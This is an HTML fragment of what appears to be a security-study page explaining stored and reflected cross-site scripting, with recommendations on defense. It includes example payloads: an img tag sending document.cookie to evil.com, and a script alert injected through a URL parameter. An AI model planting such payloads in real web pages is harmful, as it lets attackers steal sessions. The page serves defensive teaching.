<script>
        $("#back").click(function(){
            $('#tabContent').load("securitystudy.html");
        })
    </script>
    <style>
       #subLan{
            margin: 0;
            padding: 5px 0px 0px 0px;
        }
        #subLan li{
            padding:5px 0px 5px 0px;
            display: list-item;
        }
        #phase td{
            padding: 10px 0px 10px 0px;
        }
    </style>
    <a id="back" style="cursor: pointer;color:#0070E0">Go Back</a>
    <div align="center"><b>Cross-Site Scripting (XSS)</b></div>
    <div>Cross-site scripting is a client-side injection technique. The attacker aims to execute a malicious script in a web browser of the victim by including malicious code in a legitimate web page.The attack is possible when the web page does not validate the input data and uses the unsanitized input data to generate the output. </div>
    <br>
    <div><b>Two types of XSS attacks</b></div>
    <ul style="margin: 0;padding: 5px 0px 0px 0px;" id="subLan">
        <li><b>Stored XSS</b>
            <div>
                <ul>
                    <li>
                        The XSS is stored in the database. For example in blog sites such as Reddit, an attacker can enter a malicious script which will be saved in the database. When a user visits the website the malicious code will be executed
                    </li>
                    <li>
                        For example, if an attacker makes a comment such as “This is a &lt;img src=http://evil.com?cookie=document.cookie width=0 height=0 /&gt; XSS attack"
                    </li>
                    <li>
                        Whenever a user opens the blog having the above comment, the img tag will be added and a request will be made to the evil site with user cookies
                    </li>
                    <li>Now attacker will have the user session and attacker can make request on user’s behalf</li>
                </ul>
            </div>
        </li>
        <li><b>Reflected XSS</b>
            <div>
                <ul>
                    <li>
                        When a form is submitted or when a resource is requested, if the form contains error or if the resource is not found then the server will generate a script containing the parameters without sanitizing the data and sending it to the client.
                    </li>
                    <li>
                        For example, https://yourwebsite.com?page=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
                    </li>
                    <li>
                        On the error page, an error message will be displayed as "The requested page &lt;page parameter&gt; is not found". If the page parameter contians script, it will be executed
                    </li>
                </ul>
            </div>
        </li>
    </ul>
    <div><b>Recommendations</b>
        <ul id="subLan">
            <li>Sanitize the input, have regex for each input and compare the value against the regex</li>
            <li>Escape the special characters while displaying the data</li>
            <li>HTTPOnly should be set for authentication cookies. DOM will not have access to cookies when HTTPOnly is enabled.</li>
        </ul>
    </div>